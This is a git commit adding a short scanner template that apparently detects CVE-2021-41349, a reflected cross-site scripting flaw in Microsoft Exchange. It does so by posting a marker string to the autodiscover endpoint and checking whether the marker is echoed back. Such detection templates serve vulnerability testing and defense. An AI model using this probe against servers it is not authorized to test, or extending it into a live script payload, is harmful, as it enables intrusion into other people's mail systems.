Add CVE-2021-41349

patch-1
rootxharsh 2021-11-12 23:55:15 +05:30
parent 3f8e3ce2d0
commit 29bcd6b821
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: Exchange XSS
info:
name: Exchange XSS
author: @rootxharsh, @iamnoooob
severity: medium
requests:
- raw:
- |
POST /autodiscover/autodiscover.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
<HTTPVOID>&x=1
matchers:
- type: dsl
dsl:
- 'contains(body, "<HTTPVOID>")'